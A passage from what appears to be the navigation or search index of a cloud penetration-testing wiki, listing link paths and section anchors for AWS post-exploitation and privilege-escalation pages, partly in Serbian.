n/aws-rds-post-exploitation.html#rdsmodifydbsnapshotattribute-rdscreatedbsnapshot","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdownloaddblogfileportion","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdeletedbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsstartexporttask","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#aws---s3-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#osetljive-informacije","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#pivotiranje","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#aws---secrets-manager-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#secrets-manager","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#Čitanje-tajni","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-promena-vrednosti-tajne","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-promena-kms-ključa","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-brisanje-tajne","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#aws---ses-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#ses","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendrawemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendtemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulktemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulkemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbounce","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendcustomverificationemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#aws---sns-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#sns","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#disrupt-messages","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsdeletetopic","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snspublish","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssettopicattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssubscribe-snsunsubscribe","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsaddpermission--snsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snstagresource--snsuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#aws---sqs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqs","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssendmessage--sqssendmessagebatch","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsdeletequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqspurgequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssetqueueattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqstagqueue--sqsuntagqueue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#aws---sso--identitystore-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#sso--identitystore","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#ssodeletepermissionset--ssoputpermissionsboundarytopermissionset--ssodeleteaccountassignment","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#aws---post-eksploatacija-step-functions","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#step-functions","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesrevealsecrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesdeletestatemachine-statesdeletestatemachineversion-statesdeletestatemachinealias","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesupdatemaprun","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesstopexecution","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statestagresource-statesuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#aws---sts-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#sts","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#od-iam-kredencijala-do-konzole","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#obilaženje-ograničenja-user-agent-iz-pythona","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#aws---vpn-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#vpn","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#aws---eskalacija-privilegija","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#aws-eskalacija-privilegija","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#alati","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#aws---apigateway-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigateway","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewaypost","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdaterestapipolicy-apigatewaypatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayputintegration-apigatewaycreatedeployment-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdateauthorizer-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdatevpclink","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#aws---chime-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#chimecreateapikey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#aws---codebuild-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildcreateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch-s3getobject-s3putobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#aws---codepipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#iampassrole-codepipelinecreatepipeline-codebuildcreateproject-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codebuildupdateproject-codepipelineupdatepipeline-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipelinepollforjobs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#aws---codestar-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestar","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateprojectfromtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#aws---cloudformation-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationcreatestack","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatestackset--cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#iampassrole-cloudformationcreatestackand-cloudformationdescribestacks","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#aws---cognito-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#prikupljanje-kredencijala-iz-identity-pool-a","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identitysetidentitypoolroles-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identityupdate-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreategroup--cognito-idpupdategroup-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminconfirmsignup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmincreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminenableuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmininitiateauth--cognito-idpadminrespondtoauthchallenge","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetusersettings--cognito-idpsetusermfapreference--cognito-idpsetuserpoolmfaconfig--cognito-idpupdateuserpool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminupdateuserattributes","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserpoolclient--cognito-idpupdateuserpoolclient","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserimportjob--cognito-idpstartuserimportjob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateidentityprovider--cognito-idpupdateidentityprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-sync-analiza","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#automatski-alati","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#aws---datapipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#datapipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#iampassrole-datapipelinecreatepipeline-datapipelineputpipelinedefinition-datapipelineactivatepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws---directory-services-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#directory-services","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#dsresetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws-management-console","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#aws---dynamodb-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodb","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodbputresourcepolicy-i-opcionalno-dynamodbgetresourcepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#post-eksploatacija","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#todo-Čitajte-podatke-zloupotrebom-data-streams","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#aws---ebs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebslistsnapshotblocks-ebsgetsnapshotblock-ec2describesnapshots","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ec2createsnapshot","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#aws---ec2-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole---iamaddroletoinstanceprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole--ec2associateiaminstanceprofile-ec2disassociateiaminstanceprofile--ec2replaceiaminstanceprofileassociation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2requestspotinstancesiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2modifyinstanceattribute","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2createlaunchtemplateversionec2createlaunchtemplateec2modifylaunchtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscalingcreatelaunchconfiguration-autoscalingcreateautoscalinggroup-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscaling","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendsshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendserialconsolesshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#describe-launch-templatesdescribe-launch-template-versions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#aws---ecr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtokenecrbatchgetimage","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtoken-ecrbatchchecklayeravailability-ecrcompletelayerupload-ecrinitiatelayerupload-ecrputimage-ecruploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicgetauthorizationtoken-ecr-publicbatchchecklayeravailability-ecr-publiccompletelayerupload-ecr-publicinitiatelayerupload-ecr-publicputimage-ecr-publicuploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrputregistrypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#aws---ecs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsruntask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsstarttask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistertaskdefinition--ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsexecutecommand-ecsdescribetasks-ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistercontainerinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecscreatetaskset-ecsupdateserviceprimarytaskset-ecsdescribetasksets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#aws---efs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#efs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemdeletefilesystempolicyelasticfilesystemputfilesystempolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemclientmountelasticfilesystemclientrootaccesselasticfilesystemclientwrite","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemcreatemounttarget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemmodifymounttargetsecuritygroups","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#aws---elastic-beanstalk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkrebuildenvironment-s3-dozvole-za-pisanje-i-mnoge-druge","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplication-elasticbeanstalkcreateenvironment-elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-iampassrole-i-još-mnogo-toga","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-cloudformationgettemplate-cloudformationdescribestackresources-cloudformationdescribestackresource-autoscalingdescribeautoscalinggroups-autoscalingsuspendprocesses-autoscalingsuspendprocesses","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#aws---emr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#iampassrole-elasticmapreducerunjobflow","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreducecreateeditor-iamlistroles-elasticmapreducelistclusters-iampassrole-elasticmapreducedescribeeditor-elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#aws---eventbridge-scheduler-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#iampassrole-schedulercreateschedule--schedulerupdateschedule","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#aws---gamelift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#gameliftrequestuploadcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#aws---glue-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatejob--glueupdatejob-gluestartjobrun--gluecreatetrigger","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatejob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#aws---iam-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreatepolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamsetdefaultpolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateloginprofile--iamupdateloginprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateservicespecificcredential--iamresetservicespecificcredential","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachuserpolicy--iamattachgrouppolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachrolepolicy---stsassumeroleiamcreaterole---iamputuserpolicy--iamputgrouppolicy--iamputrolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateassumerolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamuploadsshpublickey--iamdeactivatemfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamresyncmfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdatesamlprovider-iamlistsamlproviders-iamgetsamlprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateopenidconnectproviderthumbprint-iamlistopenidconnectproviders-iam-getopenidconnectprovider-","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#aws---kms-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kms","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmslistkeyskmsputkeypolicy-kmslistkeypolicies-kmsgetkeypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreategrant","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreatekey-kmsreplicatekey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmsdecrypt","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#aws---lambda-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdainvokefunction--lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreateeventsourcemapping","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddlayerversionpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctioncode","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctionconfiguration","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreatefunctionurlconfig-lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda-mitm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#aws---lightsail-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsail","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsaildownloaddefaultkeypair","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetinstanceaccessdetails","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatebucketaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetrelationaldatabasemasteruserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdaterelationaldatabase","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailopeninstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailputinstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailsetresourceaccessforbucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatebucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatecontainerservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#aws---macie-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#macie","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#amazon-macie---zaobilaženje-reveal-sample-integriteta","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#aws---mediapackage-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotatechannelcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotateingestendpointcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#reference","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#aws---mq-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/a